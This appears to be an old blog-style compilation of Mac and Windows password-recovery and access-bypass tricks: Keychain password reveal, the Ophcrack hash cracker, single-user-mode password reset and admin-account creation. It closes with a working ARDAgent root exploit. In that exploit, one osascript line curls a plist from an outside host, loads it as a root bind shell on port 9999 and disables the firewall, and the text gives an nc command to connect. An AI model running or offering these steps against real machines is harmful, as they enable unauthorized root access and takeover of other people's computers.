Open up System Preferences –> Network –> Airport –> Configure…:

Pick the network you need and click on the little “EDIT” button and a new window pops up with specific information on this network:

Click on the “Show Password” checkbox, and ….

The password is shown in hex but dont worry it’ll still work when you paste it into your new WIFI profile if you choose to create one.

First off, open Keychain Access.app (located in /Applications/Utilities/).

Once there, scroll through the list of keys until you find the one that you’re looking for. Double click on it and check the box that says, “Show Password.” Once you authenticate with your user credentials, your forgotten password will be displayed in the text box.

Features:
» Runs on Windows, Linux/Unix, Mac OS X, …
» Cracks LM and NTLM hashes.
» Free tables available for Windows XP and Vista.
» Brute-force module for simple passwords.
» LiveCD available to simplify the cracking.
» Loads hashes from encrypted SAM recovered from a Windows partition, Vista included.

Starting with version 2.3, Ophcrack also cracks NT hashes. This is necessary if generation of the LM hash is disabled (this is default for Windows Vista), or if the password is longer than 14 characters (in which case the LM hash is not stored).

Download

Here’s how:

• Hold Apple+S when booting to enter single user mode
• #sh /etc/rc
• #passwd yourusername
• #reboot

If you can’t recall your user name, you can either look in the /Users folder (the directories are named by user), or run “niutil -list . /users”.

Also, on older systems the /etc/rc script isn’t available, apparently. If that second step fails, try mounting and starting the base services manually:

• #/sbin/fsck -y
• #/sbin/mount -uw /
• #/sbin/SystemStarter

Another method:

Here’s how to create an admin account without knowing the current administrator password.
This process basically forces your computer to re-run setup, which is what you see when you setup a new Mac.

If the computer doesn’t have an Open Firmware Password, that this should work fine. If it does, than you’re out of luck

Step 1: Boot in single user mode (Single user mode bypasses the GUI, which is all the visual stuff, and gives you something called “root access”) by pressing Command + S (Apple+S) when the first shade of blue appears on the screen, and holding it down until the screen turns black with white text.

Step 2: Wait for all the code stuff to load. Now, the first thing we need to do in single user mode is mount the hard drive so we can edit it. You enter this command in : /sbin/mount -uw /

It should say something about removing orphaned unlinked files.

Step 3: We are going to delete a little file that tells your computer every time you start up that you’ve completed the setup by entering this command: rm /var/db/.applesetupdone

It should just bump down, waiting for the next command if it worked.

Step 4: Now type, reboot

Step 5: It should shut down and reboot. Than, a setup window will appear, asking you what language you want your computer to be in, just like you see when you setup a newly purchased Mac.

A welcome video will play after you select the language. It has some pretty cool music, but if your in a room with other people, I’d mute it right after the video starts, or have headphones handy.

Step 6: Setup the computer. Select “DO NOT TRANSFER MY DATA”. Don’t worry, all your old stuff will still be there. Choose your internet connection and network, here is where you need your WEP or security password if you have one.

Step 7: Create a new local account to administer that computer. You usually want to enter the name of the computer as the longname, and the shortname what you’ll log in as. Say your computer’s old name was “Frank’s Computer”, than just put Frank as the longname, because it will automatically as ” ’s Computer” at the end. MAKE SURE THAT BOTH USERNAMES ARE DIFFERENT FROM THE EXISTING ONES, OTHERWISE IT WILL OVERWRITE.

Step 8: Finish the setup, and you should automatically be logged into your new administrator account.

I don’t have (and never have had) Screen Sharing enabled on Leopard 10.5.3, and this exploit works perfectly.
dan@Geelong:~$ ls -lh /etc/somefile
ls: /etc/somefile: No such file or directory
dan@Geelong:~$ osascript -e ‘tell app “ARDAgent” to do shell script “touch /etc/somefile”‘
dan@Geelong:~$ ls -lh /etc/somefile
-rw-rw-rw- 1 root wheel 0B Jun 18 14:16 /etc/somefile
dan@Geelong:~$ osascript -e ‘tell app “ARDAgent” to do shell script “rm /etc/somefile”‘
dan@Geelong:~$ ls -lh /etc/somefile
ls: /etc/somefile: No such file or directory
So, how dangerous is this? Here’s an example:

osascript -e ‘tell app “ARDAgent” to do shell script “cd /System/Library/LaunchDaemons ; curl -o bash.plist http://cdslash.net/temp/bash.plist [cdslash.net] ; chmod 600 bash.plist ; launchctl load bash.plist ; launchctl start com.apple.bash ; ipfw disable firewall; launchctl “‘

This will download, install, load, and start a plist that provides an interactive bash shell on port 9999, and disables the ipfw firewall (Which is not enabled by default). If you run the above, you can ‘nc localhost 9999′ and find yourself at a root shell.

To remove, run ‘launchctl unload com.apple.bash’ ‘launchctl unload /System/Library/LaunchDaemons/bash.plist’ and then ‘rm /System/Library/LaunchDaemons/bash.plist’

It should be noted that this service is accessible even if the application firewall is enabled. The only thing protecting the user at this point is their router firewall, if they have one, and that’s easily bypassed with a Python script.

So yeah; anything can be downloaded, and anything can be done with it. Scary.